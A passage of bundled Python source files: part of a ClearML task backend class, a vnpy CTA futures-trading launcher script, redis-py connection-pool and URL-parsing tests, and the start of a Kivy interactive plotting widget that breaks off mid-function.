:param str comment: Optional comment for the new task
:param dict execution_overrides: Task execution overrides. Applied over the cloned task's execution
section, useful for overriding values in the cloned task.
:param list tags: Optional updated model tags
:param str parent: Optional parent Task ID of the new task.
:param str project: Optional project ID of the new task.
If None, the new task will inherit the cloned task's project.
:param logging.Logger log: Log object used by the infrastructure.
:param Session session: Session object used for sending requests to the API
:return: The new task's ID.
"""
session = session if session else cls._get_default_session()
use_clone_api = Session.check_min_api_version('2.9')
if use_clone_api:
res = cls._send(
session=session, log=log,
req=tasks.CloneRequest(
task=cloned_task_id,
new_task_name=name,
new_task_tags=tags,
new_task_comment=comment,
new_task_parent=parent,
new_task_project=project,
execution_overrides=execution_overrides,
)
)
cloned_task_id = res.response.id
return cloned_task_id
res = cls._send(session=session, log=log, req=tasks.GetByIdRequest(task=cloned_task_id))
task = res.response.task
output_dest = None
if task.output:
output_dest = task.output.destination
execution = task.execution.to_dict() if task.execution else {}
execution = ConfigTree.merge_configs(ConfigFactory.from_dict(execution),
ConfigFactory.from_dict(execution_overrides or {}))
# clear all artifacts
execution['artifacts'] = [e for e in execution['artifacts'] if e.get('mode') == 'input']
if not hasattr(task, 'system_tags') and not tags and task.tags:
tags = [t for t in task.tags if t != cls._development_tag]
extra = {}
if hasattr(task, 'hyperparams'):
extra['hyperparams'] = task.hyperparams
if hasattr(task, 'configuration'):
extra['configuration'] = task.configuration
if getattr(task, 'system_tags', None):
extra['system_tags'] = [t for t in task.system_tags if t not in (cls._development_tag, cls.archived_tag)]
req = tasks.CreateRequest(
name=name or task.name,
type=task.type,
input=task.input if hasattr(task, 'input') else {'view': {}},
tags=tags,
comment=comment if comment is not None else task.comment,
parent=parent,
project=project if project else task.project,
output_dest=output_dest,
execution=execution.as_plain_ordered_dict(),
script=task.script,
**extra
)
res = cls._send(session=session, log=log, req=req)
cloned_task_id = res.response.id
if task.script and task.script.requirements:
cls._send(session=session, log=log, req=tasks.SetRequirementsRequest(
task=cloned_task_id, requirements=task.script.requirements))
return cloned_task_id
@classmethod
def get_all(cls, session=None, log=None, **kwargs):
# type: (Optional[Session], Optional[logging.Logger], **Any) -> Any
"""
List all the Tasks based on specific projection.
:param Session session: The session object used for sending requests to the API.
:param logging.Logger log: The Log object.
:param kwargs: Keyword args passed to the GetAllRequest
(see :class:`.backend_api.services.v2_5.tasks.GetAllRequest`)
For example:
.. code-block:: bash
status='completed', 'search_text'='specific_word', 'user'='user_id', 'project'='project_id'
:type kwargs: dict
:return: The API response.
"""
session = session if session else cls._get_default_session()
req = tasks.GetAllRequest(**kwargs)
res = cls._send(session=session, req=req, log=log)
return res
@classmethod
def get_by_name(cls, task_name):
# type: (str) -> Task
res = cls._send(cls._get_default_session(), tasks.GetAllRequest(name=exact_match_regex(task_name)))
task = get_single_result(entity='task', query=task_name, results=res.response.tasks)
return cls(task_id=task.id)
@classmethod
def _get_project_name(cls, project_id):
res = cls._send(cls._get_default_session(), projects.GetByIdRequest(project=project_id), raise_on_errors=False)
if not res or not res.response or not res.response.project:
return None
return res.response.project.name
def _get_all_events(
self, max_events=100, batch_size=500, order='asc', event_type=None, unique_selector=itemgetter("url")
):
# type: (int, int, str, str, Callable[[dict], Any]) -> Union[List[Any], Set[Any]]
"""
Get a list of all reported events.
Warning: Debug only. Do not use outside of testing.
:param max_events: The maximum events the function will return. Pass None
to return all the reported events.
:param batch_size: The maximum number of events retrieved by each internal call performed by this method.
:param order: Events order (by timestamp) - "asc" for ascending, "desc" for descending.
:param event_type: Event type. Pass None to get all event types.
:param unique_selector: If provided, used to select a value from each event, only a unique set of these
values will be returned by this method.
:return: A list of events from the task. If unique_selector was provided, a set of values selected from events
of the task.
"""
batch_size = max_events or batch_size
log_events = self.send(events.GetTaskEventsRequest(
task=self.id,
order=order,
batch_size=batch_size,
event_type=event_type,
))
returned_count = log_events.response.returned
total_events = log_events.response.total
scroll = log_events.response.scroll_id
if unique_selector:
events_list = set(map(unique_selector, log_events.response.events))
else:
events_list = log_events.response.events
while returned_count < total_events and (max_events is None or len(events_list) < max_events):
log_events = self.send(events.GetTaskEventsRequest(
task=self.id,
order=order,
batch_size=batch_size,
event_type=event_type,
scroll_id=scroll,
))
scroll = log_events.response.scroll_id
returned_count += log_events.response.returned
if unique_selector:
events_list.update(log_events.response.events)
else:
events_list.extend(log_events.response.events)
return events_list
@property
def _edit_lock(self):
# type: () -> ()
# skip the actual lock, this one-time lock will always enter
# only used on shutdown process to avoid deadlocks
if self.__edit_lock is False:
return RLock()
if self.__edit_lock:
return self.__edit_lock
if not PROC_MASTER_ID_ENV_VAR.get() or len(PROC_MASTER_ID_ENV_VAR.get().split(':')) < 2:
self.__edit_lock = RLock()
elif PROC_MASTER_ID_ENV_VAR.get().split(':')[1] == str(self.id):
filename = os.path.join(gettempdir(), 'clearml_{}.lock'.format(self.id))
# no need to remove previous file lock if we have a dead process, it will automatically release the lock.
# # noinspection PyBroadException
# try:
# os.unlink(filename)
# except Exception:
# pass
# create a new file based lock
self.__edit_lock = FileRLock(filename=filename)
else:
self.__edit_lock = RLock()
return self.__edit_lock
@_edit_lock.setter
def _edit_lock(self, value):
# type: (RLock) -> ()
self.__edit_lock = value
@classmethod
def __update_master_pid_task(cls, pid=None, task=None):
# type: (Optional[int], Optional[Union[str, Task]]) -> None
pid = pid or os.getpid()
if not task:
PROC_MASTER_ID_ENV_VAR.set(str(pid) + ':')
elif isinstance(task, str):
PROC_MASTER_ID_ENV_VAR.set(str(pid) + ':' + task)
else:
# noinspection PyUnresolvedReferences
PROC_MASTER_ID_ENV_VAR.set(str(pid) + ':' + str(task.id))
# make sure we refresh the edit lock next time we need it,
task._edit_lock = None
@classmethod
def __get_master_id_task_id(cls):
# type: () -> Optional[str]
master_pid, _, master_task_id = PROC_MASTER_ID_ENV_VAR.get('').partition(':')
# we could not find a task ID, revert to old stub behaviour
if not master_task_id:
return None
return master_task_id
@classmethod
def __get_master_process_id(cls):
# type: () -> Optional[str]
master_task_id = PROC_MASTER_ID_ENV_VAR.get().split(':')
# we could not find a task ID, revert to old stub behaviour
if len(master_task_id) < 2 or not master_task_id[1]:
return None
return master_task_id[0]
@classmethod
def __is_subprocess(cls):
# type: () -> bool
# notice this class function is called from Task.ExitHooks, do not rename/move it.
is_subprocess = PROC_MASTER_ID_ENV_VAR.get() and \
PROC_MASTER_ID_ENV_VAR.get().split(':')[0] != str(os.getpid())
return is_subprocess
@classmethod
def set_offline(cls, offline_mode=False):
# type: (bool) -> None
"""
Set offline mode, where all data and logs are stored into local folder, for later transmission
:param offline_mode: If True, offline-mode is turned on, and no communication to the backend is enabled.
:return:
"""
if not running_remotely():
ENV_OFFLINE_MODE.set(offline_mode)
InterfaceBase._offline_mode = bool(offline_mode)
Session._offline_mode = bool(offline_mode)
@classmethod
def is_offline(cls):
# type: () -> bool
"""
Return offline-mode state, If in offline-mode, no communication to the backend is enabled.
:return: boolean offline-mode state
"""
return cls._offline_mode
@classmethod
def _get_task_status(cls, task_id):
# type: (str) -> (Optional[str], Optional[str])
if cls._offline_mode:
return tasks.TaskStatusEnum.created, 'offline'
# noinspection PyBroadException
try:
all_tasks = cls._get_default_session().send(
tasks.GetAllRequest(id=[task_id], only_fields=['status', 'status_message']),
).response.tasks
return all_tasks[0].status, all_tasks[0].status_message
except Exception:
return None, None
|
runCtaTrading.py
|
# encoding: UTF-8
from __future__ import print_function
import sys
try:
reload(sys) # Python 2
sys.setdefaultencoding('utf8')
except NameError:
pass # Python 3
import multiprocessing
from time import sleep
from datetime import datetime, time
from vnpy.event import EventEngine2
from vnpy.trader.vtEvent import EVENT_LOG, EVENT_ERROR
from vnpy.trader.vtEngine import MainEngine, LogEngine
from vnpy.trader.gateway import ctpGateway
from vnpy.trader.app import ctaStrategy
from vnpy.trader.app.ctaStrategy.ctaBase import EVENT_CTA_LOG
from vnpy.trader.app.ctaStrategy import strategy
from MSDstrategy import MSDStrategy
strategy.STRATEGY_CLASS['MSDStrategy'] = MSDStrategy
#----------------------------------------------------------------------
def processErrorEvent(event):
"""
处理错误事件
错误信息在每次登陆后,会将当日所有已产生的均推送一遍,所以不适合写入日志
"""
error = event.dict_['data']
print(u'错误代码:%s,错误信息:%s' %(error.errorID, error.errorMsg))
#----------------------------------------------------------------------
def runChildProcess():
"""子进程运行函数"""
print('-'*20)
# 创建日志引擎
le = LogEngine()
le.setLogLevel(le.LEVEL_INFO)
le.addConsoleHandler()
le.addFileHandler()
le.info(u'启动CTA策略运行子进程')
ee = EventEngine2()
le.info(u'事件引擎创建成功')
me = MainEngine(ee)
me.addGateway(ctpGateway)
me.addApp(ctaStrategy)
le.info(u'主引擎创建成功')
ee.register(EVENT_LOG, le.processLogEvent)
ee.register(EVENT_CTA_LOG, le.processLogEvent)
ee.register(EVENT_ERROR, processErrorEvent)
le.info(u'注册日志事件监听')
me.connect('CTP')
le.info(u'连接CTP接口')
sleep(10) # 等待CTP接口初始化
me.dataEngine.saveContracts() # 保存合约信息到文件
cta = me.getApp(ctaStrategy.appName)
cta.loadSetting()
le.info(u'CTA策略载入成功')
cta.initAll()
le.info(u'CTA策略初始化成功')
cta.startAll()
le.info(u'CTA策略启动成功')
#l = cta.strategyDict['MSD']
#l.buy(200,1)
#l.sell(300,1)
while True:
sleep(1)
#----------------------------------------------------------------------
def runParentProcess():
"""父进程运行函数"""
# 创建日志引擎
le = LogEngine()
le.setLogLevel(le.LEVEL_INFO)
le.addConsoleHandler()
le.info(u'启动CTA策略守护父进程')
DAY_START = time(8, 45) # 日盘启动和停止时间
DAY_END = time(15, 30)
NIGHT_START = time(20, 45) # 夜盘启动和停止时间
NIGHT_END = time(2, 45)
p = None # 子进程句柄
while True:
currentTime = datetime.now().time()
recording = False
# 判断当前处于的时间段
if ((currentTime >= DAY_START and currentTime <= DAY_END) or
(currentTime >= NIGHT_START) or
(currentTime <= NIGHT_END)):
recording = True
# 记录时间则需要启动子进程
if recording and p is None:
le.info(u'启动子进程')
p = multiprocessing.Process(target=runChildProcess)
p.start()
le.info(u'子进程启动成功')
# 非记录时间则退出子进程
if not recording and p is not None:
le.info(u'关闭子进程')
p.terminate()
p.join()
p = None
le.info(u'子进程关闭成功')
sleep(5)
if __name__ == '__main__':
runChildProcess()
# 尽管同样实现了无人值守,但强烈建议每天启动时人工检查,为自己的PNL负责
#runParentProcess()
|
test_connection_pool.py
|
import os
import pytest
import redis
import time
import re
from threading import Thread
from redis.connection import ssl_available, to_bool
from .conftest import skip_if_server_version_lt
class DummyConnection(object):
description_format = "DummyConnection<>"
def __init__(self, **kwargs):
self.kwargs = kwargs
self.pid = os.getpid()
def connect(self):
pass
def is_ready_for_command(self):
return True
class TestConnectionPool(object):
def get_pool(self, connection_kwargs=None, max_connections=None,
connection_class=redis.Connection):
connection_kwargs = connection_kwargs or {}
pool = redis.ConnectionPool(
connection_class=connection_class,
max_connections=max_connections,
**connection_kwargs)
return pool
def test_connection_creation(self):
connection_kwargs = {'foo': 'bar', 'biz': 'baz'}
pool = self.get_pool(connection_kwargs=connection_kwargs,
connection_class=DummyConnection)
connection = pool.get_connection('_')
assert isinstance(connection, DummyConnection)
assert connection.kwargs == connection_kwargs
def test_multiple_connections(self):
pool = self.get_pool()
c1 = pool.get_connection('_')
c2 = pool.get_connection('_')
assert c1 != c2
def test_max_connections(self):
pool = self.get_pool(max_connections=2)
pool.get_connection('_')
pool.get_connection('_')
with pytest.raises(redis.ConnectionError):
pool.get_connection('_')
def test_reuse_previously_released_connection(self):
pool = self.get_pool()
c1 = pool.get_connection('_')
pool.release(c1)
c2 = pool.get_connection('_')
assert c1 == c2
def test_repr_contains_db_info_tcp(self):
connection_kwargs = {'host': 'localhost', 'port': 6379, 'db': 1}
pool = self.get_pool(connection_kwargs=connection_kwargs,
connection_class=redis.Connection)
expected = 'ConnectionPool<Connection<host=localhost,port=6379,db=1,' \
'client_name=>>'
assert repr(pool) == expected
@skip_if_server_version_lt('2.6.9')
def test_repr_contains_db_info_tcp_wname(self):
connection_kwargs = {'host': 'localhost', 'port': 6379, 'db': 1,
'client_name': 'testing'}
pool = self.get_pool(connection_kwargs=connection_kwargs,
connection_class=redis.Connection)
expected = 'ConnectionPool<Connection<host=localhost,port=6379,db=1,' \
'client_name=testing>>'
assert repr(pool) == expected
def test_repr_contains_db_info_unix(self):
connection_kwargs = {'path': '/abc', 'db': 1}
pool = self.get_pool(connection_kwargs=connection_kwargs,
connection_class=redis.UnixDomainSocketConnection)
expected = 'ConnectionPool<UnixDomainSocketConnection<path=/abc,' \
'db=1,client_name=>>'
assert repr(pool) == expected
@skip_if_server_version_lt('2.6.9')
def test_repr_contains_db_info_unix_wname(self):
connection_kwargs = {'path': '/abc', 'db': 1, 'client_name': 'testing'}
pool = self.get_pool(connection_kwargs=connection_kwargs,
connection_class=redis.UnixDomainSocketConnection)
expected = 'ConnectionPool<UnixDomainSocketConnection<path=/abc,' \
'db=1,client_name=testing>>'
assert repr(pool) == expected
class TestBlockingConnectionPool(object):
def get_pool(self, connection_kwargs=None, max_connections=10, timeout=20):
connection_kwargs = connection_kwargs or {}
pool = redis.BlockingConnectionPool(connection_class=DummyConnection,
max_connections=max_connections,
timeout=timeout,
**connection_kwargs)
return pool
def test_connection_creation(self):
connection_kwargs = {'foo': 'bar', 'biz': 'baz'}
pool = self.get_pool(connection_kwargs=connection_kwargs)
connection = pool.get_connection('_')
assert isinstance(connection, DummyConnection)
assert connection.kwargs == connection_kwargs
def test_multiple_connections(self):
pool = self.get_pool()
c1 = pool.get_connection('_')
c2 = pool.get_connection('_')
assert c1 != c2
def test_connection_pool_blocks_until_timeout(self):
"When out of connections, block for timeout seconds, then raise"
pool = self.get_pool(max_connections=1, timeout=0.1)
pool.get_connection('_')
start = time.time()
with pytest.raises(redis.ConnectionError):
pool.get_connection('_')
# we should have waited at least 0.1 seconds
assert time.time() - start >= 0.1
def connection_pool_blocks_until_another_connection_released(self):
"""
When out of connections, block until another connection is released
to the pool
"""
pool = self.get_pool(max_connections=1, timeout=2)
c1 = pool.get_connection('_')
def target():
time.sleep(0.1)
pool.release(c1)
Thread(target=target).start()
start = time.time()
pool.get_connection('_')
assert time.time() - start >= 0.1
def test_reuse_previously_released_connection(self):
pool = self.get_pool()
c1 = pool.get_connection('_')
pool.release(c1)
c2 = pool.get_connection('_')
assert c1 == c2
def test_repr_contains_db_info_tcp(self):
pool = redis.ConnectionPool(host='localhost', port=6379, db=0)
expected = 'ConnectionPool<Connection<host=localhost,port=6379,db=0,' \
'client_name=>>'
assert repr(pool) == expected
@skip_if_server_version_lt('2.6.9')
def test_repr_contains_db_info_tcp_wname(self):
pool = redis.ConnectionPool(host='localhost', port=6379, db=0,
client_name='testing')
expected = 'ConnectionPool<Connection<host=localhost,port=6379,db=0,' \
'client_name=testing>>'
assert repr(pool) == expected
def test_repr_contains_db_info_unix(self):
pool = redis.ConnectionPool(
connection_class=redis.UnixDomainSocketConnection,
path='abc',
db=0,
)
expected = 'ConnectionPool<UnixDomainSocketConnection<path=abc,db=0,' \
'client_name=>>'
assert repr(pool) == expected
@skip_if_server_version_lt('2.6.9')
def test_repr_contains_db_info_unix_wname(self):
pool = redis.ConnectionPool(
connection_class=redis.UnixDomainSocketConnection,
path='abc',
db=0,
client_name='testing',
)
expected = 'ConnectionPool<UnixDomainSocketConnection<path=abc,db=0,' \
'client_name=testing>>'
assert repr(pool) == expected
class TestConnectionPoolURLParsing(object):
def test_defaults(self):
pool = redis.ConnectionPool.from_url('redis://localhost')
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
'host': 'localhost',
'port': 6379,
'db': 0,
'password': None,
}
def test_hostname(self):
pool = redis.ConnectionPool.from_url('redis://myhost')
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
'host': 'myhost',
'port': 6379,
'db': 0,
'password': None,
}
def test_quoted_hostname(self):
pool = redis.ConnectionPool.from_url('redis://my %2F host %2B%3D+',
decode_components=True)
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
'host': 'my / host +=+',
'port': 6379,
'db': 0,
'password': None,
}
def test_port(self):
pool = redis.ConnectionPool.from_url('redis://localhost:6380')
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
'host': 'localhost',
'port': 6380,
'db': 0,
'password': None,
}
def test_password(self):
pool = redis.ConnectionPool.from_url('redis://:mypassword@localhost')
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
'host': 'localhost',
'port': 6379,
'db': 0,
'password': 'mypassword',
}
def test_quoted_password(self):
pool = redis.ConnectionPool.from_url(
'redis://:%2Fmypass%2F%2B word%3D%24+@localhost',
decode_components=True)
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
'host': 'localhost',
'port': 6379,
'db': 0,
'password': '/mypass/+ word=$+',
}
def test_db_as_argument(self):
pool = redis.ConnectionPool.from_url('redis://localhost', db='1')
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
'host': 'localhost',
'port': 6379,
'db': 1,
'password': None,
}
def test_db_in_path(self):
pool = redis.ConnectionPool.from_url('redis://localhost/2', db='1')
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
'host': 'localhost',
'port': 6379,
'db': 2,
'password': None,
}
def test_db_in_querystring(self):
pool = redis.ConnectionPool.from_url('redis://localhost/2?db=3',
db='1')
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
'host': 'localhost',
'port': 6379,
'db': 3,
'password': None,
}
def test_extra_typed_querystring_options(self):
pool = redis.ConnectionPool.from_url(
'redis://localhost/2?socket_timeout=20&socket_connect_timeout=10'
'&socket_keepalive=&retry_on_timeout=Yes&max_connections=10'
)
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
'host': 'localhost',
'port': 6379,
'db': 2,
'socket_timeout': 20.0,
'socket_connect_timeout': 10.0,
'retry_on_timeout': True,
'password': None,
}
assert pool.max_connections == 10
def test_boolean_parsing(self):
for expected, value in (
(None, None),
(None, ''),
(False, 0), (False, '0'),
(False, 'f'), (False, 'F'), (False, 'False'),
(False, 'n'), (False, 'N'), (False, 'No'),
(True, 1), (True, '1'),
(True, 'y'), (True, 'Y'), (True, 'Yes'),
):
assert expected is to_bool(value)
def test_invalid_extra_typed_querystring_options(self):
import warnings
with warnings.catch_warnings(record=True) as warning_log:
redis.ConnectionPool.from_url(
'redis://localhost/2?socket_timeout=_&'
'socket_connect_timeout=abc'
)
# Compare the message values
assert [
str(m.message) for m in
sorted(warning_log, key=lambda l: str(l.message))
] == [
'Invalid value for `socket_connect_timeout` in connection URL.',
'Invalid value for `socket_timeout` in connection URL.',
]
def test_extra_querystring_options(self):
pool = redis.ConnectionPool.from_url('redis://localhost?a=1&b=2')
assert pool.connection_class == redis.Connection
assert pool.connection_kwargs == {
'host': 'localhost',
'port': 6379,
'db': 0,
'password': None,
'a': '1',
'b': '2'
}
def test_calling_from_subclass_returns_correct_instance(self):
pool = redis.BlockingConnectionPool.from_url('redis://localhost')
assert isinstance(pool, redis.BlockingConnectionPool)
def test_client_creates_connection_pool(self):
r = redis.Redis.from_url('redis://myhost')
assert r.connection_pool.connection_class == redis.Connection
assert r.connection_pool.connection_kwargs == {
'host': 'myhost',
'port': 6379,
'db': 0,
'password': None,
}
def test_invalid_scheme_raises_error(self):
with pytest.raises(ValueError):
redis.ConnectionPool.from_url('localhost')
class TestConnectionPoolUnixSocketURLParsing(object):
def test_defaults(self):
pool = redis.ConnectionPool.from_url('unix:///socket')
assert pool.connection_class == redis.UnixDomainSocketConnection
assert pool.connection_kwargs == {
'path': '/socket',
'db': 0,
'password': None,
}
def test_password(self):
pool = redis.ConnectionPool.from_url('unix://:mypassword@/socket')
assert pool.connection_class == redis.UnixDomainSocketConnection
assert pool.connection_kwargs == {
'path': '/socket',
'db': 0,
'password': 'mypassword',
}
def test_quoted_password(self):
pool = redis.ConnectionPool.from_url(
'unix://:%2Fmypass%2F%2B word%3D%24+@/socket',
decode_components=True)
assert pool.connection_class == redis.UnixDomainSocketConnection
assert pool.connection_kwargs == {
'path': '/socket',
'db': 0,
'password': '/mypass/+ word=$+',
}
def test_quoted_path(self):
pool = redis.ConnectionPool.from_url(
'unix://:mypassword@/my%2Fpath%2Fto%2F..%2F+_%2B%3D%24ocket',
decode_components=True)
assert pool.connection_class == redis.UnixDomainSocketConnection
assert pool.connection_kwargs == {
'path': '/my/path/to/../+_+=$ocket',
'db': 0,
'password': 'mypassword',
}
def test_db_as_argument(self):
pool = redis.ConnectionPool.from_url('unix:///socket', db=1)
assert pool.connection_class == redis.UnixDomainSocketConnection
assert pool.connection_kwargs == {
'path': '/socket',
'db': 1,
'password': None,
}
def test_db_in_querystring(self):
pool = redis.ConnectionPool.from_url('unix:///socket?db=2', db=1)
assert pool.connection_class == redis.UnixDomainSocketConnection
assert pool.connection_kwargs == {
'path': '/socket',
'db': 2,
'password': None,
}
def test_extra_querystring_options(self):
pool = redis.ConnectionPool.from_url('unix:///socket?a=1&b=2')
assert pool.connection_class == redis.UnixDomainSocketConnection
assert pool.connection_kwargs == {
'path': '/socket',
'db': 0,
'password': None,
'a': '1',
'b': '2'
}
class TestSSLConnectionURLParsing(object):
@pytest.mark.skipif(not ssl_available, reason="SSL not installed")
def test_defaults(self):
pool = redis.ConnectionPool.from_url('rediss://localhost')
assert pool.connection_class == redis.SSLConnection
assert pool.connection_kwargs == {
'host': 'localhost',
'port': 6379,
'db': 0,
'password': None,
}
@pytest.mark.skipif(not ssl_available, reason="SSL not installed")
def test_cert_reqs_options(self):
import ssl
class DummyConnectionPool(redis.ConnectionPool):
def get_connection(self, *args, **kwargs):
return self.make_connection()
pool = DummyConnectionPool.from_url(
'rediss://?ssl_cert_reqs=none')
assert pool.get_connection('_').cert_reqs == ssl.CERT_NONE
pool = DummyConnectionPool.from_url(
'rediss://?ssl_cert_reqs=optional')
assert pool.get_connection('_').cert_reqs == ssl.CERT_OPTIONAL
pool = DummyConnectionPool.from_url(
'rediss://?ssl_cert_reqs=required')
assert pool.get_connection('_').cert_reqs == ssl.CERT_REQUIRED
class TestConnection(object):
def test_on_connect_error(self):
"""
An error in Connection.on_connect should disconnect from the server
see for details: https://github.com/andymccurdy/redis-py/issues/368
"""
# this assumes the Redis server being tested against doesn't have
# 9999 databases ;)
bad_connection = redis.Redis(db=9999)
# an error should be raised on connect
with pytest.raises(redis.RedisError):
bad_connection.info()
pool = bad_connection.connection_pool
assert len(pool._available_connections) == 1
assert not pool._available_connections[0]._sock
@skip_if_server_version_lt('2.8.8')
def test_busy_loading_disconnects_socket(self, r):
"""
If Redis raises a LOADING error, the connection should be
disconnected and a BusyLoadingError raised
"""
with pytest.raises(redis.BusyLoadingError):
r.execute_command('DEBUG', 'ERROR', 'LOADING fake message')
pool = r.connection_pool
assert len(pool._available_connections) == 1
assert not pool._available_connections[0]._sock
@skip_if_server_version_lt('2.8.8')
def test_busy_loading_from_pipeline_immediate_command(self, r):
"""
BusyLoadingErrors should raise from Pipelines that execute a
command immediately, like WATCH does.
"""
pipe = r.pipeline()
with pytest.raises(redis.BusyLoadingError):
pipe.immediate_execute_command('DEBUG', 'ERROR',
'LOADING fake message')
pool = r.connection_pool
assert not pipe.connection
assert len(pool._available_connections) == 1
assert not pool._available_connections[0]._sock
@skip_if_server_version_lt('2.8.8')
def test_busy_loading_from_pipeline(self, r):
"""
BusyLoadingErrors should be raised from a pipeline execution
regardless of the raise_on_error flag.
"""
pipe = r.pipeline()
pipe.execute_command('DEBUG', 'ERROR', 'LOADING fake message')
with pytest.raises(redis.BusyLoadingError):
pipe.execute()
pool = r.connection_pool
assert not pipe.connection
assert len(pool._available_connections) == 1
assert not pool._available_connections[0]._sock
@skip_if_server_version_lt('2.8.8')
def test_read_only_error(self, r):
"READONLY errors get turned in ReadOnlyError exceptions"
with pytest.raises(redis.ReadOnlyError):
r.execute_command('DEBUG', 'ERROR', 'READONLY blah blah')
def test_connect_from_url_tcp(self):
connection = redis.Redis.from_url('redis://localhost')
pool = connection.connection_pool
assert re.match('(.*)<(.*)<(.*)>>', repr(pool)).groups() == (
'ConnectionPool',
'Connection',
'host=localhost,port=6379,db=0,client_name=',
)
@skip_if_server_version_lt('2.6.9')
def test_connect_from_url_tcp(self):
connection = redis.Redis.from_url('redis://localhost',
client_name='testing')
pool = connection.connection_pool
assert re.match('(.*)<(.*)<(.*)>>', repr(pool)).groups() == (
'ConnectionPool',
'Connection',
'host=localhost,port=6379,db=0,client_name=testing',
)
def test_connect_from_url_unix(self):
connection = redis.Redis.from_url('unix:///path/to/socket')
pool = connection.connection_pool
assert re.match('(.*)<(.*)<(.*)>>', repr(pool)).groups() == (
'ConnectionPool',
'UnixDomainSocketConnection',
'path=/path/to/socket,db=0,client_name=',
)
@skip_if_server_version_lt('2.6.9')
def test_connect_from_url_unix(self):
connection = redis.Redis.from_url('unix:///path/to/socket',
client_name='testing')
pool = connection.connection_pool
assert re.match('(.*)<(.*)<(.*)>>', repr(pool)).groups() == (
'ConnectionPool',
'UnixDomainSocketConnection',
'path=/path/to/socket,db=0,client_name=testing',
)
@skip_if_server_version_lt('2.6.9')
def test_name(self, r):
connection = redis.Redis(client_name='testing')
assert connection.client_getname() == 'testing'
|
cheap_image.py
|
__cheap_image_perf__ = False
if (__cheap_image_perf__) :
import time
print("--- %15.8g --- cheap_image.py start"%(time.perf_counter()))
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.image as mi
import matplotlib.tri as tri
from matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas
from matplotlib.figure import Figure
if (__cheap_image_perf__) :
print("--- %15.8g --- imported matplotlib"%(time.perf_counter()))
from kivy.clock import Clock
from kivy.uix.widget import Widget
from kivy.core.window import Window
from kivy.graphics import RenderContext, Color, Rectangle, BindTexture
from kivy.graphics.texture import Texture
from kivy.properties import ListProperty, NumericProperty
if (__cheap_image_perf__) :
print("--- %15.8g --- imported kivy"%(time.perf_counter()))
from array import array
if (__cheap_image_perf__) :
print("--- %15.8g --- imported array"%(time.perf_counter()))
# import threading
# import time
# Data dictionary: datadict has form {'u':u,'v':v,'V':V,'s1':s1d,'s2':s2d,'t':t,'err':err}
# Station dictionary: statdict has form {<station code>:{'on':<True/False>,'name':<name>,'loc':(x,y,z)}}
__cheap_image_debug__ = False
class InteractivePlotWidget(Widget):
tex_coords = ListProperty([0, 1, 1, 1, 1, 0, 0, 0])
default_zoom_factor = NumericProperty(1.0)
def __init__(self, **kwargs):
if (__cheap_image_perf__) :
print("--- %15.8g --- InteractivePlotWidget.__init__ start"%(time.perf_counter()))
self.canvas = RenderContext()
self.nx = 1024
self.ny = self.nx
# print("On init:",self.nx,self.ny)
with self.canvas:
Color(1, 1, 1)
self.texture = Texture.create(size=(self.nx,self.ny))
# self.buf = [0,0,0,255]*(self.nx*self.ny)
# self.arr = array('B',self.buf)
self.arr = bytearray([0,0,0,255]*(self.nx*self.ny))
# self.update_mpl()
self.texture.blit_buffer(self.arr, colorfmt='rgba', bufferfmt='ubyte')
BindTexture(texture=self.texture, index=0)
self.texture.wrap = 'clamp_to_edge'
# create a rectangle on which to plot texture (will be at index 0)
Color(1,1,1)
self.rect = Rectangle(size=(self.default_zoom_factor*self.nx,self.default_zoom_factor*self.ny),texture=self.texture)
self.rect.tex_coords = self.tex_coords
if (__cheap_image_perf__) :
print("--- %15.8g --- InteractivePlotWidget.__init__ made canvas"%(time.perf_counter()))
self.plot_frozen = False
# call the constructor of parent
# if they are any graphics objects, they will be added on our new
# canvas
super(InteractivePlotWidget, self).__init__(**kwargs)
# We'll update our glsl variables in a clock
# Clock.schedule_interval(self.update_glsl, 0)
Clock.schedule_interval(self.texture_init, 0)
# Generate some default resizing behaviors
self.bind(height=self.resize)
self.bind(width=self.resize)
if (__cheap_image_perf__) :
print("--- %15.8g --- InteractivePlotWidget.__init__ done"%(time.perf_counter()))
def update_glsl(self, *largs):
# This is needed for the default vertex shader.
self.canvas['projection_mat'] = Window.render_context['projection_mat']
self.canvas['modelview_mat'] = Window.render_context['modelview_mat']
def texture_init(self, *args):
self.texture = self.canvas.children[-1].texture
self.update_glsl()
def on_touch_move(self,touch) :
if (not self.plot_frozen) :
x_shift = - touch.dpos[0]/float(self.rect.size[0])
y_shift = touch.dpos[1]/float(self.rect.size[1])
for i in range(0,8,2) :
self.tex_coords[i] = self.tex_coords[i] + x_shift
self.tex_coords[i+1] = self.tex_coords[i+1] + y_shift
self.tex_coords = self.check_boundaries(self.tex_coords)
self.rect.tex_coords = self.tex_coords
def on_touch_down(self,touch) :
if (touch.is_double_tap) :
self.tex_coords = [0, 1, 1, 1, 1, 0, 0, 0]
self.rect.tex_coords = self.tex_coords
maxwidth = self.default_zoom_factor*max(self.width,self.height*self.nx/self.ny)
self.rect.size = self.check_size((maxwidth,self.ny*maxwidth/self.nx))
self.rect.pos = (0.5*(self.width-self.rect.size[0]),(self.height-self.rect.size[1]))
x_shift = 0.0
y_shift = -0.5*(self.height-self.rect.size[1])/self.rect.size[1]
for i in range(0,8,2) :
self.tex_coords[i] = self.tex_coords[i] + x_shift
self.tex_coords[i+1] = self.tex_coords[i+1] + y_shift
self.tex_coords = self.check_boundaries(self.tex_coords)
self.rect.tex_coords = self.tex_coords
def zoom_in(self) :
if (__cheap_image_debug__) :
print("InteractivePlotWidget.zoom_in:",self.rect.tex_coords,self.height)
old_size = self.rect.size
self.rect.size = self.check_size((self.rect.size[0]*1.414,self.rect.size[1]*1.414))
self.rect.pos = (0.5*(self.width-self.rect.size[0]),(self.height-self.rect.size[1]))
y_shift = 0.5 * (self.rect.size[0]/old_size[0]-1.0) * self.height/self.rect.size[1]
x_shift = 0
if (__cheap_image_debug__) :
